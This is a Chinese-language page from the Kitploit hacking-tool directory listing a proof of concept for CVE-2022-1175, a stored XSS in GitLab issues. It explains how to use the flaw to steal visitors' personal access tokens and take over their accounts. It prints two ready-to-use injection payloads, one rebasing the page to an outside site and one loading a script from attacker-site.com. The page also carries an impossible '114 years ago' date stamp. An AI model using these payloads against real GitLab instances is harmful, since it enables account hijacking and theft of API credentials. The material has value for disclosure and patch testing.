Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-1175 | Kitploit
工具/GitHubGitHub/greenwolf/cve-2022-1175
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubgreenwolf/cve-2022-1175

CVE-2022-1175

查看仓库
114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1175

GitLab 存储型 XSS,可以在项目(无论是你自己的还是其他用户的)的 issue 中设置。可发起攻击,例如创建并窃取任何访问该 issue 用户的个人访问令牌(PAT)。获取 PAT 后,即可获得该用户完整的 GitLab API 访问权限,等同于完全接管账户。

可以通过将项目的 base 更改为你的站点来滥用此漏洞,从而使脚本从你的站点加载。更改你站点上的 JavaScript,使其与页面中调用的脚本名称匹配。不过这可能会破坏页面上的某些功能。

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>

根据站点的 CSP 策略,标准脚本引入方式也可以生效。这种方式更加隐蔽。

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>

GitLab 开发人员顺手在代码中包含了完整的 XSS 字符串,可在此处找到:

https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4

参考:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175

下载工具